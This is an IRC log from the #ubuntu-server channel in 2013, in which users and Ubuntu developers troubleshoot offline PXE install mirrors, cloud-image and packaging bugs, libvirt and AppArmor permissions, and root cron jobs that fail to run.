<patdk-wk> are you sure you mirrored the repos correctly?
<patdk-wk> doing it from the iso image isn't good enough
<Sakrecoer7> ok... so i can safely ignore anyone who tells me i should mount the .iso at a location accesible by apache?
<patdk-wk> well, I guess it might work, but I have never done that or attempted it
<patdk-wk> easier to just mirror the repos
<Sakrecoer7> well.... no.. i'm not sure...this tutorial took me the furthest: https://help.ubuntu.com/community/Installation/LocalNet#Desktop_Installation
<patdk-wk> you could feed the mirror from the iso at first though
<patdk-wk> where did you get your netboot images?
<Sakrecoer7> "mirror teh repos"... sounds delicious.... could you point me to some sort of howto please?
<patdk-wk> I'm thinking your netboot image is newer than your iso image, and there is the issue
<Sakrecoer7> i've tried this one: http://archive.ubuntu.com/ubuntu/dists/precise-updates/main/installer-i386/current/images/netboot/
<Sakrecoer7> and this one : http://archive.ubuntu.com/ubuntu/dists/raring/main/installer-i386/current/images/netboot/
<rbasak> smoser: lgtm, thanks.
<Sakrecoer7> both with all iso version available for 12.04 and 13.04 ...
<Sakrecoer7> and i really mean it by ALL :) two times each :D
<rbasak> Oooh. I wasn't aware of ArgumentParser.add_mutually_exclusive_group.
<patdk-wk> Sakrecoer7, there are two ways
<patdk-wk> apt-mirror or rsync
<patdk-wk> I used apt-mirror for awhile, but didn't like it, rsync just seemed to work better
<patdk-wk> https://help.ubuntu.com/community/Rsyncmirror
<patdk-wk> it will use some diskspace, wonder what current is? 10gigs?
<Sakrecoer7> sorry patdk-wk, diskspace? as on the drive of my server?
<patdk-wk> whereever this mirror copy is going live
<patdk-wk> if you use like apt-cacher, it could mirror only the needed parts
<patdk-wk> but your still likely to run into issues doing that, without full time internet backend on it
<Sakrecoer7> ok.... well... second bogus: there is no internet to be obtained in my scenario.... :(
<patdk-wk> I personally use apt-cacher-ng so all my servers use the local cached copy, except for first time accesses
<patdk-wk> Sakrecoer7, there is no netboot on your iso image?
<Sakrecoer7> ah man... i had this delcious dream where someone build this package like usb-creator-common, but it was called LAN-creator-common.. and it would let me inject my own system and all its app but no personal settings/personal home to any PXE capabale machine...
<patdk-wk> heh, I have a pxe server that does that
<patdk-wk> have whole lists of installs to pick from, management tools, and backup software
<Sakrecoer7> sorry patdk-wk, my iso images come from ubuntu server.... i beleive they keep netboot and iso seperated, except the mini.iso that is in the netboot section of their downloads...
<patdk-wk> but I think it's just a mix of different netboot and iso images causing the issue
<Sakrecoer7> aaaw.... now you made me jalous :D
<Sakrecoer7> yes.... i think so too... but where is cahlry aka the corresponding kernel?
<Sakrecoer7> cahlry=charly
<Sakrecoer7> it's not in ubuntu12.04.1-2-3 alternate/dekstop, nor in xubuntu, lubuntu.... :(
<patdk-wk> Sakrecoer7, on the internet mirrors
<patdk-wk> Sakrecoer7, maybe you should try that
<patdk-wk> setup apt-cacher-ng
<patdk-wk> feed it the iso
<patdk-wk> install using your netboot
<patdk-wk> then you will have a complete mirror of what is needed locally
<patdk-wk> cause it will pull what it doesn't have from the internet
<patdk-wk> then you can take it offline
<smoser> rbasak, 'filter_item' moved to simplestreams/filters.py
<smoser> are you opposed to dropping unused argument 'target' ?
<rbasak> Looking
<Sakrecoer7> apt-cacher-ng you say? i have to try that! that would sort of cache everything apt-get is pulling down localy?
<Sakrecoer7> anyways, thanks you SO much for your time patdk-wk, it is HIGHLY apreciated :)
<rbasak> smoser: my intention was that the args are identical to MirrorWriter.filter_item.
<rbasak> smoser: although I'm not doing it, a basic implementation of a MirrorWriter subclass that wants to filter items could just use *args, **kwargs that way.
<smoser> yeah, but they're not anyway. :)
<patdk-wk> Sakrecoer7, yep
<rbasak> They're not?
<smoser>     def filter_item(self, data, src, target, pedigree):
<smoser>         return filters.filter_item(self.filters, data, src, pedigree)
<smoser> self.filters is added.
<patdk-wk> but when you take it offline, you need to move it from apt-cacher-ng to a normal webserver
<zul> jamespage:  mongodb is getting there i had to backout a patch for precise and include a patch so far
<patdk-wk> cause apt-cacher-ng will still want internet
<rbasak> Right, but you can still do it with *args, **kwargs
<patdk-wk> not sure if it has an offline mode
<jamespage> zul, urhg
<rbasak> Just tack the filters on to the front.
<jamespage> zul, which ones?
<zul> jamespage:  debian/patches/0007-Use-TIME_UTC_-macro.patch and a patch that adds a header file
<Sakrecoer7> aha.... but.... that would sort of "cp /everything_in_apt-cacher-ng /var/www/ on the apache / bootp/ tftpd-hda server?
<Sakrecoer7> i mean... its just about copying the files pulled down into apt-cache to the accessible webroot aka manualyset mirror adress?
<patdk-wk> no
<patdk-wk> it's about telling apt-get to use apt-cacher-ng as a webproxy
<patdk-wk> just make sure you install, and configure the sample one, with everything you want to install
<Sakrecoer7> haha.... this has got to be the most difficult/frustrating linux excerise i've been trhu :)
<jamespage> zul, can you tweak the TIME_UTC one to work on precise?
<patdk-wk> it's really simple :)
<Sakrecoer7> but but... i keep moral and faith!
<patdk-wk> the trick is you want it offline
<jamespage> and does the new one work on saucy
<smoser> rbasak, i dont know. your "basic implementation" described is hardly different or more complex without that.
<smoser> http://paste.ubuntu.com/6063133/
<Sakrecoer7> i hope i will say so too very soon :D
<smoser> ie, is 'A' significantly worse than 'B' ?
<zul> jamespage:  possibly i havent tried on saucy yet
<zul> jamespage:  im still building locally so im still trying to iron things out
<Sakrecoer7> and if i ever get to say so, i will write a superduper howto!
<jamespage> zul, you might want to disable tests otherwise builds take a long time
<Sakrecoer7> (ok maybe only super due to my spelling :D)
<zul> jamespage:  heh now you tell me ;)
<rbasak> smoser: I mean: filter_item(self, *args, **kwargs): return filters.filter_item(self.filters, *args, **kwargs).
<rbasak> smoser: it stops you needing to deal with the details of the args.
<rbasak> smoser: or perhaps the parent class should default to self.filters=[], and define filter_item as standard.
<rbasak> Would that be cleaner?
<smoser> rbasak, i just pushed with all 4 of your patches.
<smoser> we can argue about that change separately.
<rbasak> Thank you!
<rbasak> I have instructions and some rudimentary packages ready.
<smoser> ie, i removed the target.
<smoser> mostly because pylint odesn't like it.
<rbasak> Just testing again now, and I'll stick them in a PPA for an initial review.
<rbasak> (of the basic idea that works all the way through. There's still plenty to be done)
<smoser> woot.
<zul> jamespage:  woot it builds...lemme try the patches against saucy
<Sakrecoer7> patdk-wk: you don't happen to have a sort of howto setup your super magic pxeserver? (sorry for stupid question, but better stupid 2 seconds than stupid life long)
<patdk-wk> I don't do howtos, they are pretty useless
<patdk-wk> they work for a specific set of simular enviroments
<RoyK> patdk-wk: they may be pretty good if written well
<patdk-wk> and only work for a limited length of time
<patdk-wk> royk, you mean made so generic it's almost useless?
<patdk-wk> and my case doesn't help him at all, cause mine is all online, and he wants offline, that is highly different for what his issues are
<RoyK> patdk-wk: some, well, yes, but I've had good help with some as well
<patdk-wk> his issue isn't setting up pxe and dhcp
<patdk-wk> but with getting a good set of offline repo to install from
<RoyK> patdk-wk: sometimes it's good to learn the basics first - how things are put together
<Sakrecoer7> both RoyK and patdk-wk have good points: its good to learn from howtos, because more often they are so generic that you get the right vocabulary to develope your own procedure :D
<RoyK> Sakrecoer7: they are usually a bit better than manpages, though :P
<Sakrecoer7> RoyK: yes :) and much better than nothing!
<RoyK> indeed
<jamespage> adam_g, I pushed a couple of neutron/quantum related fixes to the nova-cloud-controller redux branch
<jamespage> looking at nova-compute now
<adam_g> jamespage, cool
<adam_g> jamespage, do yous till have concerns re: quantum/neutron naming of things?
<jamespage> adam_g, i've not tested an upgrade quantum->neutron in ncc yet
<jamespage> works OK in quantum-gateway
<adam_g> i did some more testing and added comments to http://pad.ubuntu.com/redux-testing
<jamespage> aside from the fact the charm name is now fud
<adam_g> ceph volumes + images tested just fine for grizzly but was hitting an issue with havana, but am unsure if its the charms, packages, openstack, etc.
<jamespage> adam_g, hmm - not touched that yet
<jamespage> ceph was looking OK on havana/saucy last time I tested
<adam_g> ok. ill poke closer at it today
<jamespage> adam_g, 'band
<jamespage> or #bang even
<jamespage> swift-proxy has no package set for havana
 * jamespage fixes that
<Dian_Le_Roux> hi all
<Dian_Le_Roux> i'm looking for documentation about qmail-ldap with courier-imap on ubuntu 12.04
<Dian_Le_Roux> any ideas?
<jamespage> adam_g, argh - this is like unpicking a stitch
<jamespage> adam_g, really needs a redux to new model
<adam_g> jamespage, for what?
<jamespage> adam_g, swift-proxy
<jamespage> adam_g, I stated but .. lp:~openstack-charmers/charms/precise/swift-proxy/havana
<adam_g> jamespage, whats the problem?
<jamespage> adam_g, its just not had the updates for havana yet
<jamespage> version mappings etc...
<jamespage> it currently has dumb template path resolution as well
<jamespage> templates + os_release
<adam_g> jamespage, oh, you mean redux to the new model?
<jamespage> adam_g, yah
<adam_g> jamespage, ill add it to the blueprint
<adam_g> jamespage, keystone needs it too
<jamespage> adam_g, +1
<jamespage> yes
<jamespage> but
<jamespage> n,
<jamespage> nm
<jamespage> eod for me
<jamespage> ttfn
<adam_g> jamespage, cya :)
<jamespage> adam_g, oh - could you do me a favour?
<smoser> utlemming, ping.
<jamespage> the openvswitch-datapath-lts-raring-dkms packages are awaiting verification in precise-propsed
<jamespage> adam_g, they are for the lts-raring kernel
<utlemming> smoser: pong
<jamespage> any chance you could give them a sniff?
<adam_g> jamespage, ya. bug #?
<smoser> utlemming, http://paste.ubuntu.com/6063358/
<smoser> does that make any sense to you ?
<smoser> the context is basically that on hyper-v 12.04 "just works" but 13.10 does not.
<smoser> and 13.10 seems to fail to get an IP address.
<jamespage> adam_g, bug 1213021
<uvirtbot> Launchpad bug 1213021 in openvswitch-lts-raring "[SRU] openvswitch 1.4.0 not compatible with lts-raring HWE kernel" [High,Fix committed] https://launchpad.net/bugs/1213021
<utlemming> smoser: er, no it does not make much sense....otp, but I'll dig on it
<adam_g> jamespage, ack
<adam_g> http://people.canonical.com/~agandelman/ca/havana/libjs-swfobject-2.2+dfsg-1~cloud0/
<adam_g> jamespage, zul new pkg
<zul> adam_g: +1
<adam_g> zul, k. all its dependencies look to be satisifed in precise already
<zul> awesome
<smoser> utlemming, ugn...
<smoser> are you able to launch azure instances and log in ?
<jamespage> adam_g, zul: github.com connection is working again
<zul> jamespage:  cool i have mongodb that passes tests in saucy and precise ill post the debdiff tomorrow morning for you to look at before uploaded
<adam_g> jamespage, ya, saw the jenkins instance get bombed with a bunch of builds
<utlemming> smoser: negative, I was just looking at that right now
<smoser> console output sure would be nice :)
<utlemming> smoser: so we do have a problem...no ovf-env.xml in /var/lib/waagent
<utlemming> smoser: utlemming@utl-0904-p1.cloudapp.net has Saucy mounted under /mnt1
<utlemming> smoser: you're auth'ed for access
<smoser> utlemming, there are files in /mnt1/var/lib/cloud/seed/nocloud-net/
<utlemming> smoser: wtf?
 * utlemming looks deeper
<smoser> yeah, confirmed that looks to be it.
<smoser> 2013-09-04 17:15:16,621 - stages.py[DEBUG]: Loaded datasource DataSourceNoCloudNet - DataSourceNoCloudNet [seed=/var/lib/cloud/seed/nocloud-net][dsmode=net]
<utlemming> smoser: found the issue. There is a typo for the test to see if it is either Saucy or Precise for configuring cloud-init to use Azure provisioning. I'm fixing that now, and will have a test image in ~30 minutes.
<utlemming> smoser: can you file me a high priority bug?
<smoser> yeah.
<utlemming> smoser: building now....
<utlemming> smoser: brb, have to reboot...my keyboard is flaky
<utlemming> smoser: back
<smoser> utlemming, https://bugs.launchpad.net/ubuntu/+bug/1220855
<uvirtbot> Launchpad bug 1220855 in ubuntu "azure images have populated /var/lib/cloud/seed/nocloud-net, breaking login" [High,Confirmed]
<utlemming> smoser: launch test image now...
<smoser> utlemming,
<smoser> https://bugs.launchpad.net/ubuntu/+bug/1220860
<uvirtbot> Launchpad bug 1220860 in ubuntu "azure simplestreams data has odd pubname" [Medium,Confirmed]
<utlemming> smoser: ack
<smoser> bug 665235
<uvirtbot> Launchpad bug 665235 in cloud-init "grub-legacy-ec2: attaching a volume to maverick instance may boot off it" [Wishlist,Won't fix] https://launchpad.net/bugs/665235
#ubuntu-server 2013-09-05
<NickyP> i have a LAMP/apache2 server. The web page part works great. I also have file that I need for an application on the server that is 5 dirs down from the web server root. I get Forbidden response when I try to wget the file. What should the permissions / user
<NickyP> ;groups be to get this to behave?
<sarnold> NickyP: you need to make sure that the file can be read by the web server, and all directories above it can be read and traversed by the web server
<NickyP> If is try to wget the index.html off the top I get the same thing
<NickyP> Forbidden
<sarnold> NickyP: ah, nice. that gives you some good evidence to look for in the logs.
<NickyP> should the user:group be www-data for both
<sarnold> It would be better if the webserver didn't own the data.
<NickyP> k
<NickyP> what is the common log location. there seems some indirection in the docs about  it
<sarnold> NickyP: check /var/log/apache2/ for a first shot (this is me guessing :)
<NickyP> k. ty
<qman__> www-data should not own any files, but those files should be readable by www-data
<qman__> meaning, either grant world-read or use acls
<BullShark> what's the way to disable a service from auto starting on boot in ubuntu?
<geser> BullShark: does the service get started through an upstart job?
<BullShark> geser -> the service is postfix
<BullShark> it's in /etc/init.d/postfix
<geser> sudo update-rc.d postfix disable
<BullShark> geser -> that is disabling for all runlevels?
<geser> yes
<geser> see the manpage for update-rc.d if you want to disable it for specific runlevels
<BullShark> yep, i was looking
<BullShark>        update-rc.d [-n] <basename> disable|enable [S|2|3|4|5]
<BullShark> this update-rc.d command doesn't do similar to chkconfig --list
<BullShark> =/
<GeorgeJ> Hello folks!
<GeorgeJ> Is there any reason I should not use 13.04 on a production server?
<hxm> hi
<hxm> i just added a new hard disk to my machine
<hxm> i use frisk -l and it appears
<hxm> without partition table
<hxm> how can I add it and format it?
<hxm> cfdisk
<hxm> why this http://pastebin.com/tmcrygK4
<RoyK> hxm: erm - why ntfs?
<zul> rbasak:  ping http://paste.ubuntu.com/6066380/ (i just wanted to get a second pair of eyes before uploading this)
<zetheroo1> what does "allow-hotplug" do in the /etc/network/interfaces file?
<ogra_> zetheroo1, man interfaces ?
<rbasak> zul: should the pocket be precise on that changelog? I'm not familiar with uploading to the cloud archive.
<zul> rbasak:  nah needs to go to saucy first then its backported to precise
<rbasak> zul: dropping 0007-Use-TIME_UTC_-macro.patch lgtm assuming that you're only going to build that with an older version of boost. If you're building for saucy too, won't that FTBFS in saucy then?
<zul> rbasak:  nope built it on saucy as well
<rbasak> zul: it looks like the patch was supposed to handle both cases, but I guess that's not working. Is something defining MONGO_BOOST_TIME_UTC_HACK when it shouldn't?
<zul> rbasak:  yeah basically it removed the boost detection version when using MONGO_BOOST_TIME_UTC_HACK
<rbasak> Did that patch come from Debian?
<zul> i think so
<rbasak> I'm just confused as to why it's there otherwise. If Debian put it there because Debian are ahead of us on boost, then will we FTBFS again when we transition?
<zul> it shouldnt
<collectek> Hello all, How do I set a service to run at start? *using server 12.04
<collectek> and are there any heartbeat resident experts around ;-)
<andrew> hi all
<lequtix> there we go
<lequtix> hi everone
<rbasak> hallyn_: ping. Do you know of any libvirt issues on precise wrt. ownership and permissions of directory-based volume image files? It works on saucy, but in precise when I try to start an instance libvirt changes the permissions of disk images to root.root, and then can't open them.
<rbasak> (this is despite me explicitly telling it what uid/gid to use. libvirt seems to ignore that when it creates the volume, and vol-dumpxml returns -1 for uid and gid.
<rbasak> )
<lequtix> did u try using sticky bit?
<lequtix> or setguid
<lequtix> on the parent directory
<lequtix> does libvirt have a config files somewhere you can change the createmask
<rbasak> lequtix: thanks for the thought. But the mode it uses is 0600, so manipulating group ownership on its own won't help
<lequtix> yea but it has to be the parent directory
<rbasak> THe problem here seems to be that the default means that it just won't work.
<lequtix> i find messing with individual files is useless..  try setting the mask on the parent dir
<lequtix> i was running minecraft once..  i wanted to make it so the OP's couldn't op anyone else..  so i set the permissions on the file to 555 ..  it wouldn't work..  the only time i could secure the file was by securing the parent dir
<rbasak> lequtix: the sgid bit didn't help. It seems that libvirt is overwriting the permissions after it creates the file
<lequtix> i  had to make a dir.. put the ops.txt file in the dir.. and put a symlink to it
<lequtix> set permissions of dir to 555
<rbasak> libvirt should be doing the right thing by default.
<lequtix> thats just my experience
<hallyn_> rbasak: yeah i think historically the ownership handling wasn't done very well.  There were some patches relating to DAC gong by recently so maybe that's why it's fixed in saucy
<hallyn_> rbasak: but the question is: why can't libvirtd open them, it runs as root
<lequtix> linux file permissions is somewhat of a mystery
<rbasak> hallyn_: it's qemu that can't open them.
<rbasak> hallyn_: I presume qemu is running as libvirt-qemu.kvm or something.
<lequtix> what about running the virtualization daemon as another user
<hallyn_> rbasak: yeah and libvirtd def should chown them for it.
<hallyn_> rbasak: are you doing anything custom?
<rbasak> hallyn_: yes, to some extent. I'm creating my own volume pool.
<hallyn_> rbasak: what sort of pool?  is apparmor perhaps not allowing qemu to read there?
<lequtix> its as if it can't read the file, so it's recreating it with bad permissions
<rbasak> hallyn_: aha. Yes!
<rbasak> hallyn_: thanks.
<hallyn_> np
 * rbasak wonders what's different with apparmor in saucy
<hallyn_> we may have added something...  are you using ceph?
<rbasak> No. Just libvirt + ubuntu cloud images.
<rbasak> It might be that the newer libvirt-specific apparmor wrapper thing parses the definition and makes the images readable?
<rbasak> It looks like the generated profile is correctly adding the file entries for my different pool location
<Arrick> good morning all, I am attempting to get a cron task to run every 5 minutes, but for some reason I cant seem to get it to run... I can run it fine manually though...
<rbasak> I guess something's just going wrong with that.
<lequtix> just disable apparmor and see if it magically works
<lequtix> is that possible
<lequtix> ?
<lequtix> if it works you've found your issue.. then u know what to work on
<rbasak> Yes, I'm looking into that.
<rbasak> Unfortunately libvirt apparmor profiles are dynamic so I'm not sure it's trivial.
<Arrick> this should work for every 5 minutes, correct?
<Arrick> */5 * * * * /usr/bin/php /www/mwtraining/admin/cli/cron.php /www/mwtraining/cron-log.txt
<lequtix> well.. if they are dynamic then there must be a config file that outlines it's behavior
<lequtix> Arrick, if it's a 5 minute interval it's easy to test right?
<lequtix> :O
<Arrick> lequtix, thats why i am asking... is that setup right, because I cant find any proof that it's running.
<lequtix> make another job identical except have it write some random data to a text file...
<lequtix> echo "it works!!!" >/opt/fart.txt
<lequtix> then in 5 minutes check fart.txt
<Arrick> the last time it ran was august 20... and I am not understainding why.
<RoyK> Arrick: is cron running?
<lequtix> # Minute   Hour   Day of Month       Month          Day of Week        Command
<Arrick> dont know how to tel.
<RoyK> Arrick: ps axf| grep -i cron
<RoyK> Arrick: pastebin the output of that
<RoyK> !pastebin | Arrick
<ubottu> Arrick: For posting multi-line texts into the channel, please use http://paste.ubuntu.com | To post !screenshots use http://imagebin.org/?page=add | !pastebinit to paste directly from command line | Make sure you give us the URL for your paste - see also the channel topic.
<Arrick> http://paste.ubuntu.com/6066899/
<Arrick> I think that means its stopped right?
<lequtix> */5 * * * * /home/ramesh/backup.sh will execute every 5 minutes
<lequtix> provided that cron is running
<Arrick> RoyK, ^
<lequtix> you have a crontab editor open?
<lequtix> but yea other than that it doesn't look like u have cron running
<Arrick> I did have it open.
<Arrick> How do I get it running?
<lequtix> http://paste.ubuntu.com/6066912/
<lequtix> thats what mine looks like
<RoyK> Arrick: cron runs as pid 1152 according to that
<Arrick> is it running then?
<RoyK> yes
<lequtix> ok.. then put in a job that does something you can monitor
<RoyK> Arrick: cron usually generates email on error
<lequtix> make a bash script to write random data to a file
<Arrick> now to figure out why it isnt working... where in that line to I add the echo "it works!!!" >/opt/fart.txt for testing?
<RoyK> Arrick: it will also log its stuff to /var/log/syslog
<lequtix> then run it on a cron schedule
<RoyK> Arrick: * * * * * date >> /tmp/crontest.txt
<RoyK> Arrick: try that
<lequtix> yea that will work
<RoyK> Arrick: it should run that job ever minute and log the time it was run
<Arrick> ok, will check in a minute, it is added
<RoyK> Arrick: running this as root?
<Arrick> sudo, yeah
<lequtix> i don't think arrick's cron daemon is running... his pastebin indicates that he has only the crontab editor open
<RoyK> Arrick: and are you adding the jobs with crontab -e, or editing stuff under /etc/cron(something)?
<lequtix> nvm
<lequtix> 1152
<Arrick> crontab -e
<RoyK> k
<lequtix> don't use sudo in a crontab tho right?
<Arrick> its been a couple minutes now, an nojoy
<lequtix> it might ask for password and hang the job
<lequtix> maybe restart cron
<lequtix> sudo service cron restart
<Arrick> date: invalid date `/tmp/crontest.txt'
<RoyK> Arrick: sudo -i
<RoyK> Arrick: then pastebin crontab -l
<Arrick> just got a failure when I setup the crontext as me.
<RoyK> Arrick: ok - pastebin "tail -50 /var/log/syslog"
<Arrick> output seperated by >>>>>>>>>>>>>>>>>>>>>>>>>>>>> http://paste.ubuntu.com/6066933/
<Arrick> I removed my username from the paste though.
<RoyK> Arrick: ah - try to create a script - /tmp/crontest.sh with something like http://paste.ubuntu.com/6066938/ and chmod +x that file, and call that file in cron instead of the command
<RoyK> Arrick: I've seen cron having problems with redirects
<Arrick> we'll know in a minute
<lequtix> at least you know it's firing now
<lequtix> if it's erroring, it's trying
<Arrick> it wasnt firing under root, it was firing under my user account though... I tested crontab -e from both accounts to make sure.
<RoyK> Arrick: to the same output file?
<Arrick> yeah
<RoyK> did you pastebin that "tail -50 /var/log/syslog" command?
<lequtix> make the root crontab output to a different file
<RoyK> or rather, its output :P
<Arrick> its on the bottom of the first one.
<lequtix> if they fire at the same  time,, only one can write to the fiel
<lequtix> other will error
<RoyK> lequtix: no, linux doesn't work that way
<RoyK> lequtix: it queues up writes
<Arrick> http://paste.ubuntu.com/6066963/
<lequtix> how can two processes write to the file at the same time?
<lequtix> oh ok
<Arrick> I ran the cmd again
<RoyK> Sep  5 11:45:02 training sSMTP[26161]: Sent mail for root@miworksmo.org (221 2.0.0 Service closing transmission channel) uid=0 username=root outbytes=508
<RoyK> Arrick: check the root mail
<Arrick> lol, how?
<RoyK> Arrick: install mutt or something
<Arrick> no, I mean where...
<RoyK> or even better - forward the root mail to your personal email account
<RoyK> apt-get install mutt
<RoyK> run mutt
<RoyK> as root
<RoyK> make sure you run an mta like postfix
<RoyK> (anything, really, but postfix is really easy to setup)
<lequtix> exim4 has a nice wizard to set it up...  dpkg-reconfigure
<Arrick> last message april 22
 * RoyK only uses postfix and can only speak of what he likes :P
 * lequtix totally understands
<lequtix> :D
<lequtix> you should try the exim on a test vm
<lequtix> and run the reconfigure package
<lequtix> maybe it's not as easy as postfix
<lequtix> its too bad we have to complicate his issue by configuring mail servers
<lequtix> lol
<Arrick> it already has a mail server setup, thats how I'm getting the emailed errors
<lequtix> ok..
<RoyK> lequtix: can't really be bothered - I know postfix - I know how to configure it by hand - no point of learning exim, then ;)
<Arrick> nothing is showing up in the mail
<lequtix> so just install mutt then ..
<Arrick> yeah, I did
<Arrick> last email in was april 22
<RoyK> Arrick: anyting in /var/log/mail.log ?
<Arrick> nope
<Arrick> wait
<Arrick> typo
<RoyK> are postfix or exim installed?
<Arrick> yep.
<RoyK> ok
<RoyK> pastebin?
<Arrick> last post >>>> Sep  5 11:53:03 training sSMTP[26455]: Sent mail for root@miworksmo.org (221 2.0.0 Service closing transmission channel) uid=0 username=root outbytes=508
<lequtix> I wonder if the daily crontab is running
<lequtix> cus i think that runs as root
<just-a-visitor> Collected tips/pointers on why crontab possibly does not work: http://askubuntu.com/questions/23009/reasons-why-crontab-does-not-work
<RoyK> Arrick: have you forwarded root's email to somewhere?
<Arrick> not that I know of
<Arrick> I did install mutt, but as I mentioned the last mail was april 22 to the root acct there.
<Arrick> bah... typo in the crontest.sh nam... I named it crontext.txt
<RoyK> Arrick: what happens if you 'echo test | mail -s test root' ?
<RoyK> Arrick: does that arrive in root's mailbox?
<Arrick> lol, mail is not currently installed.
<RoyK> apt-get install -y mailutils
<RoyK> or mailx
<Arrick> im testing it as my user account right quick.
<Arrick> ok... RoyK I just got Cron is not running. reported to me when I tried that cron job (first one) after modding permissions on the log file.
<RoyK> Arrick: the email sent from the local machine should arrive immedately
<Arrick> it does.
<RoyK> to root as wel?
<RoyK> s/wel/well/
<Arrick> when it errors, yes
<Arrick> not sure why it isnt putting the messages in for root...
<RoyK> so you can't send email to root?
<Arrick> if I run the echo test | mail -s test root it doesnt error, but when i run mutt I cant see the msg.
<RoyK> perhaps try to nuke root's mailbox
<RoyK> never seen that happen, though
<RoyK> perhaps the mbox is corrupt somehow
<Arrick> how would I do that?
<RoyK> sudo -i
<RoyK> rm $MAIL
<RoyK> that'll remove the mailbox
<RoyK> (beyond easy recovery)
<Arrick> permission denied....
<RoyK> perhaps it's sticky, then
<RoyK> > $MAIL
<RoyK> that should truncate it
<Arrick> ok, did that, ran mutt, no messages... ran the echo cmd again, no messages showed up.
<RoyK> check /var/log/mail.log again
<RoyK> pastebin the last 50 lines or so (tail -50 ...)
<Arrick> http://paste.ubuntu.com/6067100/
<RoyK> pastebin ~root/.forward and /etc/aliases, please
<RoyK> and perhaps output of 'mailq'
<Arrick> I just checked the cron-log.txt file it is pointing too, and it ran a minute ago
<lequtix> i feel bad for Arrick..  his issue went from cron to figuring out why the fuk he's not getting emaisl
<lequtix> :S
<lequtix> there must be a way of troubleshooting cron without a mail daemon
<RoyK> lequtix: well, we might even find out ;)
<Arrick> cron is working under my user account, but not under the root account.
<RoyK> Arrick: that's why you need email working
<lequtix> ok.. so we need to figure out under which circumstances cron would not run root jobs
<lequtix> i'm sure it's documented
<Arrick> cron is working, im happy... if i do too much more to this server, it will probably break the software on it, lol.
<lequtix> yea but there is probably a documented circumstance under which cron will NOT execute ANY root crontabs
<RoyK> Arrick: nothing you have done yet today (afaik) could have broken much - can you pastebin those I asked for?
<lequtix> its probably just a config
<RoyK> lequtix: famous last words ;)
<lequtix> lol
<lequtix> well if NO root jobs are firing (daily monthly etc..)
<lequtix> then that tells me the system is explicitly telling cron not to run those jobs
<Arrick>  ~root/.forward says no such file or directory
<RoyK> that's good
<RoyK> what about /etc/aliases ?
<Arrick> postmaster: root
<Arrick> mailq is empty
<RoyK> nothing like root: something?
<Arrick> nope
<RoyK> postfix or exim?
<RoyK> or sendmail :P
<Arrick> neither is installed
<RoyK> apt-get install postfix
<Arrick> brb, dealing with a small fire here.
<RoyK> ouch
<lequtix> i'll bet his /etc/cron.d/anacron config doesn't have any root jobs
<lequtix> somewhere along the line there are no definitions for the root crontab
<RoyK> lequtix: why shouldn't it?
<lequtix> i dunno.. perhaps someone else modified it on him
<lequtix> since it runs everyone elses' jobs
<lequtix> and only root is excluded
<lequtix> that points to some kinda config
<lequtix> admitedly tho i'm no expert
<lequtix> but it's suspicious to me that only root is excluded from cron
 * RoyK curses under his breath and takes a closer look at his home server
<lequtix> haha.. i know how u feel man
<just-a-visitor> Arrick: Burning cron.
<lequtix> http://pastebin.ubuntu.com/6067149/
<lequtix> this is what my /etc/cron.d/anacron file looks like
<lequtix> alot of pages on the web point to the root users' PATH variable when it comes to cron
<lequtix> i guess if it can't find sh or bash then it can't execute the scripts
<lequtix> but if that were the case i suppose there would be some kind of error in system.log
<lequtix> http://serverfault.com/questions/72237/user-cron-jobs-are-not-running-but-system-jobs-are
<lequtix> this is interesting.. it basically says crontab lines need to end in a newline char
<lequtix> maybe root's crontab was edited manually without a newline at one point
<lequtix> so it stopped firing
<lequtix> i'd rename it and create a new root crontab exactly like the old one .. but using crontab -e
<lequtix> RoyK ..  you think there's any validity to that?
<lequtix> RoyK .. http://serverfault.com/questions/72237/user-cron-jobs-are-not-running-but-system-jobs-are
<lequtix> RoyK ..  If someone edited the root crontab directly and didn't put a newline on the end perhaps it's preventing all root jobs from running..?
<RoyK> not sure
<lequtix> i guess it would help to have access to his box
<lequtix> i mean we have established that cron is definately working
<lequtix> we just need reasons why root jobs would fail to execute
<RoyK> Arrick: ping
<lequtix> so far i've read that the root's PATH variable
<lequtix> and editing the crontab manually cause issues
 * RoyK is on the edge of beating his home server to death
<sarnold> lequtix: I'd strongly suggest using '-u root' to crontab -e when edting root's crontab, just to be on the safe side and ensure you're getting the one desired
<sarnold> RoyK: man what's up with your machine?
<lequtix> sarnold .. its actually Arrick that's having the issues
<lequtix> he's afk dealing with small fire
<lequtix> metaphorically i'm hoping
<sarnold> lequtix: aha, I figured it wasn't you, but you're doing themost helping :) hehe
<sarnold> lets hope so..
<lequtix> his root cron jobs aren't firing but regular user cron jobs ARE
<RoyK> sarnold: zfs issues, or so it looks
<sarnold> RoyK: eeeek
<lequtix> i know it's irrelavent to your problem, but why did you choose zfs?
<lequtix> you doing some kinda cluster FS?
<sarnold> lequtix: I've seen people try to shove the m h dom mon dow  fields into the /etc/cron.{daily,hourly,weekly}/ things before, without success...
<lequtix> yea that's good good poing sarnold
<lequtix> point
<zul> hallyn_:  ping
<RoyK> sarnold: indeed - no big chance for me to bother to debug that shite tonight
<RoyK> [  730.156529] Out of memory: Kill process 20146 (php) score 940 or sacrifice child
<RoyK> [  730.157654] Killed process 20146 (php) total-vm:19335892kB, anon-rss:15531616kB, file-rss:808kB
<Arrick> im back
<RoyK> that's out of memory just after I tried to rebuild zfs, on a system with 16 gigs of RAM
<RoyK> Arrick: wb
<sarnold> RoyK: daaaamn. I heard the de-dup requires a lot of memory, but I'd have thought 16 gigs would be plenty for that.
<sarnold> RoyK: amd64 or pae 32 bit?
<RoyK> amd64
<sarnold> okay
<RoyK> sarnold: not using dedup
<sarnold> RoyK: woah hey, how'd php get 16 terabytes of address space?
<RoyK> sarnold: I've been testing dedup in a controlled environment and found it didn't work too well without half a terabyte of RAM or so (for the data I was managing back then)
<sarnold> RoyK: oh, that's only 18 gigs. nevermind. hey wait how'd php get 18 gigs of address space? :)
<RoyK> no idea
<RoyK> I shut the box down - will look into it later
<sarnold> makes sense
<sarnold> good luck :)
<Arrick> is kinda funny that my cron job IS running, but that my cronwatcher is reporting that cron ISNT running?
<RoyK> thanks
<RoyK> Arrick: try to restart cron
<Arrick> restarted
<RoyK> Arrick: and - mail to root now works?
<sarnold> RoyK: (maybe get a memtest86 run going while the machine is down?)
<RoyK> sarnold: have tried
<sarnold> okay
<RoyK> sarnold: also, if the memory was the problem, I'd be seeing lots of random segfaults, which I'm not
<Arrick> negative
<RoyK> Arrick: that's not positive
<Arrick> of course, the cron jobs are set to a log file, would it still email as well?
<RoyK> Arrick: focus on one thing at a time
